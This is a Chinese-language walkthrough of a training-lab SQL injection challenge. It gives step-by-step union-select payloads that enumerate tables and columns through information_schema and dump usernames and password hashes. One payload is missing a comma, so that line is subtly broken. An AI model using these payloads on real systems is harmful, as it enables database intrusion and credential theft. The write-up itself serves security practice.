一·判斷注入
輸入id=1,正常回傳,輸入id=-1回傳錯誤,由 此可知存在注入,
二·判斷欄位
URL id=-1 order by 1
URL id=-1 order by 2
URL id=-1 order by 3
URL id=-1 order by 4
URL id=-1 order by 5 此時報錯,說明有四個欄位
三·使用union查詢注入點
輸入union select 1,2,3,4
發現2,3為顯注點
四·使用database()查庫名
輸入 union select 1,database(),3,4
查出庫名為 mozhe_Discuz_StormGroup
五·查表名
輸入
union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’
查詢到StormGroup_member,notice
看見member,所以對第一個產生懷疑,所以首先查詢第一個,
六·查詢StormGroup_member中的存放的欄位
輸入
union select 1,group_concat(column_name)3,4 from information_schema.columns where table_name=‘StormGroup_member’
查詢出id,name,password,status
七·查詢密碼和用戶名
union select 1,group_concat(name,0x3a,password),3,4 from StormGroup_member
得到md5加密后的值,進行解密,得到密碼,
如果密碼不對,通過limit m,n來繼續查詢,
八·提交key
得到密碼后進行登錄可以看見key,復制,提交,
轉載請註明出處,本文鏈接:https://www.uj5u.com/houduan/205412.html
標籤:java